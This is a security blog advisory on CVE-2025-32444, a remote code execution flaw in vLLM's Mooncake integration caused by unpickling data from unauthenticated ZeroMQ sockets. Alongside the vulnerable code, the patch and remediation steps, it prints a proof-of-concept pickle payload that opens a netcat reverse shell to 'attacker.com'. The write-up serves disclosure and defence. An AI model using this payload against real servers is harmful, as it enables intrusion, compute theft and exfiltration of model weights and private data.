CVE-2025-32444

Pickle Rick-Roll: Critical RCE in vLLM's Mooncake Integration

Alon Barad
Alon Barad
Software Engineer

Jan 11, 2026·5 min read

Executive Summary (TL;DR)

vLLM developers used Python's `pickle` serialization over exposed ZeroMQ sockets for the Mooncake integration. This allows any attacker who can reach the port to send a malicious packet and gain instant root execution on the GPU cluster. CVSS 10.0.

A critical Remote Code Execution (RCE) vulnerability exists in vLLM's Mooncake distributed KV cache transfer mechanism. The flaw stems from the use of insecure Python pickling over unauthenticated ZeroMQ sockets bound to all network interfaces.

The Hook: Speed Kills

In the race for AI dominance, inference speed is king. vLLM has crowned itself the monarch of high-throughput LLM serving, and for good reason—it’s fast, efficient, and widely adopted. To make things even faster, they introduced Mooncake, an optimized KVCache transfer architecture designed to shuttle memory between GPUs like a relentless data conveyor belt.

But here's the thing about conveyor belts: if you don't put a guard rail around them, someone is going to lose an arm. In vLLM's case, the "arm" is the entire security model of the host machine.

The developers implemented a high-performance communication channel using ZeroMQ (ZMQ). It sounds standard enough until you peek under the hood and realize they prioritized convenience over sanity. They built a remote command execution feature, they just didn't realize it at the time.

The Flaw: The Forbidden Pickle

If you've been in security for more than a week, you know the cardinal rule of Python: Never unpickle untrusted data. It is not a suggestion; it is a law of nature. Yet, in 2025, we are still seeing this specific anti-pattern in critical infrastructure software.

The vulnerability lives in vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py. The developers used the pyzmq library to handle network communication. This library offers two convenience methods: send_pyobj() and recv_pyobj().

These functions are syntactic sugar that automatically serialize Python objects using pickle before sending them over the wire. When the receiving server calls recv_pyobj(), it implicitly calls pickle.loads() on whatever raw bytes hit the socket. There is no authentication, no signature verification, and no handshake. It is a blind trust exercise with the internet.

The Code: The Smoking Gun

Let's look at the vulnerable code. It is almost tragically simple. The server binds a socket and waits for an object.

# vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py (Vulnerable)
 
def recv_bytes(self) -> bytes:
    """Receive bytes from the remote process."""
    # 🚩 The fatal flaw: implicitly unpickles data off the wire
    src_ptr, length = self.receiver_socket.recv_pyobj()
    
    dst_ptr = self.allocate_managed_buffer(length)
    self.transfer_sync(dst_ptr, src_ptr, length)

Compounding this sin, the sockets were bound using a wildcard address:

# Binds to 0.0.0.0, exposing this to the world
self.sender_socket.bind(f"tcp://*:{p_rank_offset + 1}")

In the patched version (v0.8.5), the developers finally stripped out the magic. They replaced the object serialization with explicit binary packing using Python's struct module. This treats the input as raw numbers rather than executable objects.

# The Fix: Explicit binary unpacking
import struct
 
# Receiver side
data = self.receiver_socket.recv_multipart()
# Only accepts 8-byte unsigned long longs (Q)
src_ptr = struct.unpack("!Q", data[0])[0]
length = struct.unpack("!Q", data[1])[0]

The Exploit: Weaponizing Python

Exploiting this is trivial. We don't need buffer overflows or complex heap feng shui. We just need to ask Python nicely to run a shell command.

Python's pickle protocol allows objects to define how they should be unpickled via the __reduce__ method. If we define a class that returns a callable (like os.system) and arguments (like a reverse shell command) in its __reduce__ method, that callable executes the moment the victim deserializes our packet.

Here is what a researcher's Proof of Concept looks like:

import pickle
import zmq
import os
 
# 1. Craft the bomb
class RCE(object):
    def __reduce__(self):
        # The classic reverse shell
        cmd = 'nc -e /bin/sh attacker.com 1337'
        return (os.system, (cmd,))
 
# 2. Connect to the vulnerable vLLM instance
context = zmq.Context()
socket = context.socket(zmq.PAIR)
# The target port usually follows a predictable offset pattern
socket.connect("tcp://target-vllm-host:port")
 
# 3. Fire and forget
payload = pickle.dumps(RCE())
socket.send(payload)

The moment socket.send(payload) completes, the vLLM server executes the command as the user running the model (often root in containerized GPU environments).

The Impact: Your GPUs Are Now Mine

Why is this a CVSS 10.0? Because AI infrastructure is high-value target territory.

  1. Compute Theft: An attacker can immediately kill your inference jobs and repurpose your H100 cluster for crypto mining or cracking passwords.
  2. IP Theft: They have shell access. They can exfiltrate the proprietary model weights you spent millions training.
  3. Data Exfiltration: If you are using RAG (Retrieval-Augmented Generation), the attacker potentially has access to the vector database credentials and the private documents being processed.

Since these services often run inside Docker containers with mounted volumes and heavy resource access, escaping to the host or pivoting to other cloud resources is the next logical step for an intruder.

The Fix: Closing the Door

If you are running vLLM with Mooncake enabled, you are sitting on a ticking time bomb.

Immediate Actions:

  1. Update: Upgrade to vLLM 0.8.5 immediately. The patch moves from pickle to struct and restricts socket binding to specific hosts.
  2. Firewall: Why is your inference engine listening on 0.0.0.0? Use iptables or Security Groups to whitelist strictly trusted IPs for these ports.
  3. Disable Mooncake: If you can't patch, disable the Mooncake integration via configuration. It's better to be slightly slower than completely owned.

Fix Analysis (1)

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
2.54%
Top 15% most exploited

Affected Systems

vLLM Inference EngineMooncake KV Transfer System

Affected Versions Detail

Product
Affected Versions
Fixed Version
vLLM
vllm-project
>= 0.6.5, < 0.8.50.8.5
AttributeDetail
CWECWE-502 (Deserialization of Untrusted Data)
CVSS v3.110.0 (Critical)
Attack VectorNetwork (Remote)
Librarypyzmq (recv_pyobj)
ImpactRemote Code Execution (Root/User)
ProtocolZeroMQ (TCP)
CWE-502
Deserialization of Untrusted Data

The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.

Vulnerability Timeline

Fix committed to GitHub
2025-04-25
GHSA Advisory Published
2025-04-29
CVE Assigned
2025-04-30

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.